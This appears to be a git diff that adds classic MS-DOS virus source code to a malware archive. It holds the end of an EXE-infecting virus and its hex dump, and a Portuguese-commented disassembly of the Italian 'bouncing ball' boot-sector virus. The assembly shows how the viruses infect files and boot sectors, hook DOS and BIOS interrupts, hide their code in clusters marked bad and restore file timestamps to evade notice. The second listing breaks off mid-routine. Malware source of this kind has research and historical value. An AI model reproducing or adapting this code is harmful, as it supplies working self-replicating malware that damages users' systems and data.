+ REP CS:MOVSB ;04D7 2EA4
+ MOV CX,DI ;04D9 8BCF
+ XOR DX,DX ;04DB 33D2
+ MOV AH,40H ;
+ INT 21H ;WRITE TO A FILE
+L04E1: JC L04F0 ;
+ JMP L05A2 ;
+ ;
+;---------------------------------------;
+; READ EXE HEADER ;
+;---------------------------------------;
+L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER
+ MOV DX,offset EXE_HDR ;
+ MOV AH,3F ;
+ INT 21H ;READ FILE
+ JC L053C ;
+ ;
+;---------------------------------------;
+; TWEEK EXE HEADER TO INFECTED HSOT ;
+;---------------------------------------;
+ MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO
+ MOV AX,[EXE_HDR+14] ; SS
+ MOV [HOST_SS],AX ;
+ MOV AX,[EXE_HDR+16] ; SP
+ MOV [HOST_SP],AX ;
+ MOV AX,[EXE_HDR+20] ; IP
+ MOV [HOST_IP],AX ;
+ MOV AX,[EXE_HDR+22] ; CS
+ MOV [HOST_CS],AX ;
+ MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS)
+ CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512
+ JZ L051B ;IF FILE SIZE==0...JMP
+ DEC AX ;
+L051B: MUL Word ptr [BLOCK_SIZE] ;
+ ADD AX,[EXE_HDR+2] ;
+ ADC DX,0 ;AX NOW = FILE SIZE
+ ;
+ ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND
+ ADC DX,0 ;
+ AND AX,0FFF0H ;
+ MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS
+ MOV [HOST_SIZE+2],DX ;
+ ;
+ ADD AX,710H ;(SIZE OF VIRUS)
+ ADC DX,0 ;
+L053C: JC L0578 ;IF > FFFFFFFF...JMP
+ DIV Word ptr [BLOCK_SIZE] ;
+ OR DX,DX ;
+ JE L0547 ;
+ INC AX ;
+L0547: MOV [EXE_HDR+4],AX ;
+ MOV [EXE_HDR+2],DX ;
+ ;---------------;
+ MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE
+ MOV DX,[HOST_SIZE+2] ;
+ DIV Word ptr [A007A] ;
+ SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR
+ MOV [EXE_HDR+22],AX ;VALUE OF CS
+ MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP
+ MOV [EXE_HDR+14],AX ;VALUE OF SS
+ MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP
+ ;---------------;
+ XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR)
+ MOV DX,CX ;
+ MOV AX,4200H ;
+ INT 21H ;MOVE FILE POINTER
+L0578: JC L0584 ;
+ ;
+;---------------------------------------;
+; WRITE INFECTED EXE HEADER ;
+;---------------------------------------;
+ MOV CX,1CH ;
+ MOV DX,offset EXE_HDR ;
+ MOV AH,40H ;
+ INT 21H ;WRITE TO A FILE
+L0584: JC L0597 ;
+ CMP AX,CX ;
+ JNE L05A2 ;
+ ;
+ MOV DX,[HOST_SIZE] ;POINT TO END OF FILE
+ MOV CX,[HOST_SIZE+2]
;
+ MOV AX,4200 ;
+ INT 21H ;MOVE FILE POINTER
+L0597: JC L05A2 ;
+ ;
+;---------------------------------------;
+; WRITE VIRUS CODE TO END OF HOST ;
+;---------------------------------------;
+ XOR DX,DX ;
+ MOV CX,710H ;(SIZE OF VIRUS)
+ MOV AH,40H ;
+ INT 21H ;WRITE TO A FILE
+ ;
+L05A2: CMP Word ptr CS:[008F],0 ;IF...
+ JZ L05AE ;...SKIP
+ MOV AH,49H ;
+ INT 21H ;FREE ALLOCATED MEMORY
+ ;
+L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ...
+ JE I_90 ;...SKIP
+ ;
+ MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME
+ MOV DX,CS:[HOST_DATE] ;
+ MOV CX,CS:[HOST_TIME] ;
+ MOV AX,5701H ;
+ INT 21H ;GET/SET FILE DATE/TIME
+ ;
+ MOV AH,3EH ;
+ INT 21H ;CLOSE FILE
+ ;
+ LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE
+ MOV CX,CS:[HOST_ATT] ;
+ MOV AX,4301H ;
+ INT 21H ;CHANGE FILE MODE
+ ;
+ LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER
+ MOV AX,2524H ;
+ INT 21H ;SET VECTOR
+ ;
+I_90: POP ES ;
+ POP DS ;
+ POP DI ;
+ POP SI ;
+ POP DX ;
+ POP CX ;
+ POP BX ;
+ POP AX ;
+ POPF ; (OUR PUSHF)
+ JMP far CS:[OLD_21] ;PASS CONTROL TO DOS
+ ;
+;-----------------------------------------------------------------------;
+; ;
+;-----------------------------------------------------------------------;
+;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos......
+;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H
+;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~...............
+;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l
+;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M
+;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\..
+;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC
+;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'..
+;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM.
+;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s..
+;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w..
+;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P
+;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9
+;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@...
+;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.|
+;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C
+;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..#
+;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s
+;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9
+;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|.
+;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K
+;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S
+;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1.
+;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!.........
+;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.&
+;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8.
+;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5
+;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F...
+;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u.
+;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!...
+;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8
+;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X.....
+;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41:
+;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O..
+;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7.
+;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X...
+;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9.
+;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u
+;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t(
+;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX
+;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$..
+;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P
+;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?!
+;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+
+;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z.
+;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%.
+;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum...
+;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)...
+;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)...
+;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4
+;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>.
+;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G...
+;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR
+;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u..
+;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw.
+;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp...
+;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6..
+;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u.
+;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!....
+;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E...
+;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4>
+;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$
+;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8.
+;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I
+;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW.
+;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M
+;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9.
+;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4
+;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM!
+;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M
+;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M!
+;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_
+;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I.
+;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x..
+;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.#
+;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6
+;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!|
+;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e.
+;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3
+;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O.
+;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|...
+;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@
+;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!..
+;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t.
+;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E
+;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E.
+;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X.
+;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................
+;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M...............
+;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<.
+;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k.............
+;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]...
+;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R.........
+;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
+;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K..........
+;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
+;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
+;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:....
+;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................
+;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P..
+;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O......
+;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~
+;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p.
+;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%.......
+;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M...............
+;<<<<<<<<<< ORIGINAL CODE BEGINS HERE
+;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC
+;>>>>>>>>>> ORIGINAL CODE ENDS HERE
+;0910 4D 73 44 6F 73
+;-----------------------------------------------------------------------;
+ END
diff --git a/MSDOS/Virus.MSDOS.Unknown.ital.asm b/MSDOS/Virus.MSDOS.Unknown.ital.asm
new file mode 100644
index 00000000..157d83b9
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.ital.asm
@@ -0,0 +1,454 @@
+; **************************************************
+; *** VIRUS ITALIANO SALTITANTE - A LISTAGEM ***
+; *** Desassemblagem obtida por Miguel Vitorino ***
+; *** Para : S P O O L E R - Junho de 1989 ***
+; **************************************************
+
+.RADIX 16
+
+jmpf macro x
+ db 0eah
+ dd x
+endm
+
+Virus SEGMENT
+assume cs:virus;ds:virus
+
+jmpf MACRO x
+ db 0eah
+ dd x
+ENDM
+
+org 0100h
+
+begin: jmp short entry
+
+ db 1eh-2 dup (?) ; Informacao relativa a' disquete
+
+entry: xor ax,ax
+ mov ss,ax
+ mov sp,7c00 ; Colocar o Stack antes do inicio do
+ mov ds,ax ; virus
+ mov ax,ds:[0413] ; Retirar 2 K como se nao existissem
+ sub ax,2 ; para que o DOS nao la' chegue !
+ mov ds:[0413],ax
+ mov cl,06 ; Converter o tamanho da RAM num
+ shl ax,cl ; numero de segmento que se situa nos
+ sub ax,07c0 ; 2 ultimos K
+ mov es,ax ; De seguida passar este programa
+ mov si,7c00 ; para esse sitio de memoria
+ mov di,si ; ( i.e. o programa transfere-se a si
+ mov cx,0100 ; proprio )
+ repz movsw
+ mov cs,ax ; Transferencia de controlo para ai!
+ push cs ; Agora sim , ja' estamos nos tais 2K
+ pop ds
+ call reset ; fazer duas vezes um "reset" ao
+reset: xor ah,ah ; controlador de disco
+ int 13
+ and byte ptr ds:drive,80
+ mov bx,ds:sector ; Sector onde esta' o resto do virus
+ push cs
+ pop ax
+ sub ax,0020
+ mov es,ax
+ call ler_sector ; Ler o resto do virus da drive
+ mov bx,ds:sector
+ inc bx
+ mov ax,0ffc0 ; Carregar o sector de boot original
+ mov es,ax
+ call ler_sector
+ xor ax,ax
+ mov ds:estado,al
+ mov ds,ax
+ mov ax,ds:[004c] ; "Confiscar" o interrupt 13
+ mov bx,ds:[004e] ; ( operacoes sobre disquetes/discos )
+ mov word ptr ds:[004c],offset int_13
+ mov ds:[004e],cs
+ push cs
+ pop ds
+ mov word ptr ds:velho_13,ax ; Guardar a velha rotina do int.
13
+ mov word ptr ds:velho_13+2,bx
+ mov dl,ds:drive
+ jmpf 0:7c00 ; Efectuar o arranque do sistema
+
+Esc_Sector proc near
+ mov ax,0301 ; Escrever um sector da drive
+ jmp short cs:transferir
+Esc_Sector endp
+
+Ler_Sector proc near
+ mov ax,0201 ; Ler um sector da drive
+Ler_Sector endp
+
+Transferir proc near ; Efectuar uma transferencia de dados
+ xchg ax,bx ; de ou para a drive
+ add ax,ds:[7c1c] ; Este procedimento tem como entrada
+ xor dx,dx ; o numero do sector pretendido ( BX )
+ div ds:[7c18] ; e de seguida sao feitas as contas
+ inc dl ; para saber qual a pista e o lado
+ mov ch,dl ; onde esse sector fica
+ xor dx,dx
+ div ds:[7c1a]
+ mov cl,06
+ shl ah,cl
+ or ah,ch
+ mov cx,ax
+ xchg ch,cl
+ mov dh,dl
+ mov ax,bx ; Depois de todas as contas feitas
+transf: mov dl,ds:drive ; pode-se chamar o interrupt 13H
+ mov bx,8000 ; es:bx = end. de transferencia
+ int 13
+ jnb trans_exit
+ pop ax
+trans_exit: ret
+Transferir endp
+
+Int_13 proc near ; Rotina de atendimento ao int. 13H
+ push ds ; (operacoes sobre discos e disquetes)
+ push es
+ push ax
+ push bx
+ push cx
+ push dx
+ push cs
+ pop ds
+ push cs
+ pop es
+ test byte ptr ds:estado,1 ; Testar se se esta' a ver se o virus
+ jnz call_BIOS ; esta' no disco
+ cmp ah,2
+ jnz call_BIOS
+ cmp ds:drive,dl ; Ver se a ultima drive que foi
+ mov ds:drive,dl ; mexida e' igual a' drive onde
+ jnz outra_drv ; se vai mexer
+ xor ah,ah ; Neste momento vai-se tirar a' sorte
+ int 1a ; para ver se o virus fica activo
+ test dh,7f ; Isto e' feito a partir da leitura
+ jnz nao_desp ; da hora e se for igual a um dado
+ test dl,0f0 ; numero , o virus e' despoletado
+ jnz nao_desp
+ push dx ; Instalar o movimento da bola
+ call despoletar
+ pop dx
+nao_desp: mov cx,dx
+ sub dx,ds:semente
+ mov ds:semente,cx
+ sub dx,24
+ jb call_BIOS
+outra_drv: or byte ptr ds:estado,1 ; Indicar que se esta' a testar a
+ push si ; presenca ou nao do virus na drive
+ push di
+ call contaminar
+ pop di
+ pop si
+ and byte ptr ds:estado,0fe ;
Indicar fim de teste de virus
+call_BIOS: pop dx
+ pop cx
+ pop bx
+ pop ax
+ pop es
+ pop ds
+Velho_13 equ $+1
+ jmpf 0:0
+Int_13 endp
+
+Contaminar proc near
+ mov ax,0201
+ mov dh,0
+ mov cx,1
+ call transf
+ test byte ptr ds:drive,80 ; Pediu-se um reset a' drive ?
+ jz testar_drv ; Sim , passar a' contaminacao directa
+ mov si,81be
+ mov cx,4
+proximo: cmp byte ptr [si+4],1
+ jz ler_sect
+ cmp byte ptr [si+4],4
+ jz ler_sect
+ add si,10
+ loop proximo
+ ret
+
+ler_sect: mov dx,[si] ; Cabeca+drive
+ mov cx,[si+2] ; Pista+sector inicial
+ mov ax,0201 ; Ler esse sector
+ call transf
+testar_drv: mov si,8002 ; Comparar os 28 primeiros bytes para
+ mov di,7c02 ; ver se o sector de boot e' o mesmo
+ mov cx,1c ; i.e. ver se a drive ja' foi virada !
+ repz movsb
+ cmp word ptr ds:[offset flag+0400],1357
+ jnz esta_limpa
+ cmp byte ptr ds:flag_2,0
+ jnb tudo_bom
+ mov ax,word ptr ds:[offset prim_dados+0400]
+ mov ds:prim_dados,ax ; Se chegar aqui entao a disquete ja'
+ mov si,ds:[offset sector+0400] ; esta' contaminada !
+ jmp infectar
+tudo_bom: ret
+
+; Neste momento descobriu-se uma disquete nao contaminada ! Vai-se agora
+; proceder a' respectiva contaminacao !
+
+esta_limpa: cmp word ptr ds:[800bh],0200; Bytes por sector
+ jnz tudo_bom
+ cmp byte ptr ds:[800dh],2 ; Sectores por cluster
+ jb tudo_bom
+ mov cx,ds:[800e] ; Sectores reservados
+ mov al,byte ptr ds:[8010] ; Numero de FAT's
+ cbw
+ mul word ptr ds:[8016] ; Numero de sectores de FAT
+ add cx,ax
+ mov ax,' '
+ mul word ptr ds:[8011] ; Numero de entradas na root
+ add ax,01ff
+ mov bx,0200
+ div bx
+ add cx,ax
+ mov ds:prim_dados,cx
+ mov ax,ds:[7c13] ; Numero de sectores da drive
+ sub ax,ds:prim_dados
+ mov bl,byte ptr ds:[7c0dh] ; Numero de sectores por cluster
+ xor dx,dx
+ xor bh,bh
+ div bx
+ inc ax
+ mov di,ax
+ and byte ptr ds:estado,0fbh ; Se o numero de clusters dor superior
+ cmp ax,0ff0 ; a 0FF0 entao cada entrada na FAT sao
+ jbe sao_3 ; 4 nibbles senao sao 3
+ or byte ptr ds:estado,4 ; 4 = disco duro ?
+sao_3: mov si,1 ; Escolher sector a infectar
+ mov bx,ds:[7c0e] ; Numero de sectores reservados
+ dec bx
+ mov ds:inf_sector,bx ; Sector a infectar
+ mov byte ptr ds:FAT_sector,0fe
+ jmp short continua
+
+Inf_Sector dw 1 ; Sector a infectar
+Prim_Dados dw 0c ; Numero do primeiro sector de dados
+Estado db 0 ; Estado actual do virus (instalado/nao instalado,etc)
+Drive db 1 ; Drive onde se pediu uma accao
+Sector dw 0ec ; Sector auxiliar para procura do virus
+Flag_2 db 0 ; Estes proximos valores servem para ver se o virus
+Flag dw 1357 ; ja' esta' ou nao presente numa drive , bastando
+ dw 0aa55 ; comparar se estes valores batem certos para o saber
+
+continua: inc word ptr ds:inf_sector
+ mov bx,ds:inf_sector
+ add byte ptr ds:[FAT_sector],2
+ call ler_sector
+ jmp short l7e4b
+
+; Este pequeno pedaco de programa o que faz e' percorrer a FAT que ja' esta' na
+; memo'ria e procurar ai um cluster livre para colocar nesse sitio o resto do
+; virus
+
+verificar: mov ax,3 ; Media descriptor + ff,ff
+ test byte ptr ds:estado,4 ; disco duro ?
+ jz l7e1d
+ inc ax ; Sim , FAT comeca 1 byte mais adiante
+l7e1d: mul si ; Multiplicar pelo numero do cluster
+ shr ax,1
+ sub ah,ds:FAT_sector
+ mov bx,ax
+ cmp bx,01ff
+ jnb continua
+ mov dx,[bx+8000] ; Ler a entrada na FAT
+ test byte ptr ds:estado,4
+ jnz l7e45
+ mov cl,4
+ test si,1
+ jz l7e42
+ shr dx,cl
+l7e42: and dh,0f
+l7e45: test dx,0ffff ; Se a entrada na FAT for zero,entao
+ jz l7e51 ; descobriu-se um cluster para por o
+l7e4b: inc si ; virus , senao passa-se ao proximo
+ cmp si,di ; cluster ate' achar um bom
+ jbe verificar
+ ret
+
+; Ja' foi descoberto qual o cluster a infectar ( registo BX ) , agora vai-se
+; proceder a' infeccao da disquete ou disco e tambem a' marcacao desse cluster
+; como um "bad cluster" para o DOS nao aceder a ele
+
+l7e51: mov dx,0fff7 ; Marcar um "bad cluster" (ff7)
+ test byte ptr ds:estado,4 ; Ver qual o tamanho das ents. na FAT
+ jnz l7e68 ; ( 3 ou 4 nibbles )
+ and dh,0f
+ mov cl,4
+ test si,1
+ jz l7e68
+ shl dx,cl
+l7e68: or [bx+8000],dx
+ mov bx,word ptr ds:inf_sector ; Infectar sector !!!
+ call esc_sector
+ mov ax,si
+ sub ax,2
+ mov bl,ds:7c0dh ; Numero de sectores por cluster
+ xor bh,bh
+ mul bx
+ add ax,ds:prim_dados
+ mov si,ax ; SI = sector a infectar
+ mov bx,0 ; Ler o sector de boot original
+ call ler_sector
+ mov bx,si
+ inc bx
+ call esc_sector ; ... e guarda'-lo depois do virus
+infectar: mov bx,si
+ mov word ptr ds:sector,si
+ push cs
+ pop ax
+ sub ax,20 ; Escrever o resto do virus
+ mov es,ax
+ call esc_sector
+ push cs
+ pop ax
+ sub ax,40
+ mov es,ax
+ mov bx,0 ; Escrever no sector de boot o virus
+ call esc_sector
+ ret
+Contaminar endp
+
+Semente dw ? ; Esta word serve para fins de
+ ; temporizacao da bola a saltar
+FAT_sector db 0 ; Diz qual e' o numero do sector que
+ ; se esta' a percorrer quando se
+ ; vasculha a FAT
+
+Despoletar proc near ; Comecar a mostrar a bola no ecran
+ test byte ptr ds:estado,2 ; Virus ja' esta' activo ?
+ jnz desp_exit ; Sim ,sair
+ or byte ptr ds:estado,2 ; Nao , marcar activacao
+ mov ax,0
+ mov ds,ax
+ mov ax,ds:20 ; Posicionar interrupt 8 (relogio)
+ mov bx,ds:22
+ mov word ptr ds:20,offset int_8
+ mov ds:22,cs
+ push cs
+ pop ds ; E guardar a rotina anterior
+ mov word ptr ds:velho_8+8,ax
+ mov word ptr ds:velho_8+2,bx
+desp_exit: ret
+Despoletar endp
+
+Int_8 proc near ; Rotina de atendimento ao interrupt
+ push ds ; provocado pelo relogio 18.2 vezes
+ push ax ; por segundo . Neste procedimento
